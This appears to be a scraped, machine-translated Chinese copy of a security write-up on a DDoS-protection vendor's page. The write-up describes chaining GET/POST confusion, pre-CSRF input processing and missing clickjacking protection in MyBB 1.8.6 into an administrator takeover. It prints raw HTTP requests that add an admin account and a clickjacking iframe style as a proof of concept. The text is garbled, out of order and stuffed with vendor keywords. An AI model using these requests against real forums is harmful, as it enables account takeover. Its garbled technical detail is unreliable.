高防ip阿里_如何办_北京斗地主高防-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!

QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防火墙 > 高防ip阿里_如何办_北京斗地主高防

高防ip阿里_如何办_北京斗地主高防

小墨安全管家 2021-04-06 10:30 CC防火墙 89 ℃
DDoS防御

高防ip阿里_如何办_北京斗地主高防

点击我赢得一部IPHONE!当治理员打开链接并单击"单击我赢得IPHONE"时,游戏结束。已将用户名为admin2的治理员添加到数据库中,攻击者能够使用此治理员帐户执行任何操作。你能够经过改变密码使攻击更加隐蔽。例如,假如将不透明度设置为0,治理员甚至大概无法看到框架内容。这是POC的快照。

随着针对web应用程序的攻击不断增加,网络安全团队自然会优先消除高风险威胁,例如SQL注入和跨站点足本(XSS)漏洞。另一方面,很多网络安全团队挑选忽略或延迟对其web应用程序中低级安全漏洞的修复。不幸的是,这不是一具明智的策略。低估解决低级安全咨询题的重要性大概会给组织带来重大咨询题。为啥?经过利用看似微不脚道的漏洞组合,攻击者有时会打开一具巨大的安全漏洞,让他们造成极大的损害。在本文中,我将演示如此一具场景,展示怎么利用几个未解决的低级安全咨询题,DDoS防御,攻击者能够获得对流行web的彻底治理员访咨询权限应用程序。三在MyBB中发觉的低级咨询题在最近对MyBB的审计中,我发觉了三个低级安全咨询题,假如一起被利用,大概会让黑客彻底操纵那个人们用来创建论坛的开源应用程序。最新版本mybb1.8.7基本部分解决了那个咨询题,CC防御,所以用户不再容易受到所描述的惊险的阻碍给你。我的宝贝1.8.6包含以下次要的安全咨询题,假如单独评估它们,这些咨询题看起来微不脚道。"GET"和"POST"想法没有区别,"GET"和"POST"想法是最常见的用于发出HTTP请求。从安全角度来看,建议始终使用POST想法提交敏感数据。有兴趣详细了解"POST"和"GET"想法之间的安全性差异的人应该阅读本文,DDoS高防,DDoS防御,这篇文章将详细介绍细节.MyBB在其ACP(治理员操纵页)采纳"POST"想法提交敏感数据,如添加用户、web应用程序设置和数据库备份。可是,web应用程序并没有严格区分"POST"和"GET"请求,虽然它被设计为在默认事情下对某些类型的敏感请求使用"POST"想法,例如添加"administrator"用户.POST/mybb/上传/治理/index.php?module=user users&action=add HTTP/1.1主机:yourhost用户代理:Mozilla/5.0(Windows NT 6.1;WOW64;rv:44.0)Gecko/20100101 Firefox/44.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8答应语言:en-US,en;q=0.5答应编码:gzip,deflate Referer:?module=user users&action=add Cookie:acploginattempts=0;adminsid=543823e3302beac5eadb8ac4eb14d0ab连接:关闭内容类型:application/x-www-form-urlencoded Content Length:186Data:my_post_key=ee915bd1984d830b37cf1eff81e1fd2f&username=admin2&password=password%21&confirm\\ password=password%21&email=test%40qualys.com&usergroup=4&additionalgroups%5B%5D=4&displaygroup=4However, 您能够将"POST"请求更改为"GET"想法。应用程序将允许"GET"请求经过,并在服务器的数据库中添加一具新的治理员用户。这清晰地表明web应用程序不区分"GET"和"POST"想法.GET/mybb/上传/治理/index.php?module=user users&action=add&my_post_key=ee915bd1984d830b37cf1eff81e1fd2f&username=admin2&password=password%21&confirm帴password=password%21&email=test%40qualys.com&usergroup=4&additionalgroups%5B%5D=4&displaygroup=4HTTP/1.1Host:yourhost用户代理:Mozilla/5.0(Windows NT 6.1;WOW64;rv:44.0)Gecko/20100101 Firefox/44.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8答应语言:en-US,en;q=0.5答应编码:gzip,deflate Referer:?module=user users&action=add Cookie:acploginattempts=0;adminsid=543823e3302beac5eadb8ac4eb14d0ab连接:closeNow,有人大概会讲,那个咨询题本身并不构成潜在的风险,因为"GET"和"POST"请求都不大概在"my_POST_key"参数中没有有效值(my_POST_key充当CSRF令牌角色);而且无法伪造此参数值。然而那个小咨询题大概会升级为高级咨询题在暴露了第二个低级别的漏洞之后以下。数据在CSRF(跨站点请求伪造)验证之前举行处理假如您经过删除URL中的my_post_key参数来修改"GET"请求,则会转换并发送"GET"请求。令人惊奇的是,"GET"请求被部分处理,伪造的值被解析到响应主体中的用户输入字段中,虽然请求实际上并不通过服务器.GET/mybb/上传/治理/index.php?module=user users&action=add&username=admin2&password=password%21&confirm\u password=password%21&email=test%40qualys.com&usergroup=4&additionalgroups%5B%5D=4&displaygroup=4HTTP/1.1Host:yourhost用户代理:Mozilla/5.0(Windows NT 6.1;WOW64;rv:44.0)Gecko/20100101 Firefox/44.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8答应语言:en-US,en;q=0.5答应编码:gzip,deflate Referer:?module=user users&action=add Cookie:acploginattempts=0;adminsid=543823e3302beac5eadb8ac4eb14d0ab Connection:close当检测到CSRF令牌无效或丢失时,强壮的服务器应阻挠请求并禁止解析伪造值。虽然在我的应用程序中输入的u值仍然是伪造的,然而在那个u字段中输入的值仍然是伪造的请求。单击"劫持"漏洞此应用程序中缺少点击劫持对策是另一具安全咨询题。这是棺材上最终一颗钉子。利用那个漏洞,ACP页面大概被攻击者陷害,他或她能够诱使受害者点击某个东西不经意间。收获在利用所有这些小的安全咨询题后,经过使用这些漏洞治理访咨询,这就像从婴儿身上拿走糖果一样容易让攻击者获得治理员访咨询权限。下面的部分是一具简化的概念证明,以演示获得治理员是多么容易进入。证明治理员用户登录到他或她的MyBB应用程序并收到来自攻击者的电子邮件或评论。电子邮件或评论包含链接并用以下内容对链接举行编码。代码是直接的:它经过一具伪造值的链接来构建ACP页面宽度:1200px;高度:900px;位置:绝对;顶部:0;左:0;过滤器:alpha(不透明度=50);不透明度:0.1;}


DDoS防御

当前位置:主页 > CC防火墙 > 高防ip阿里_如何办_北京斗地主高防

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119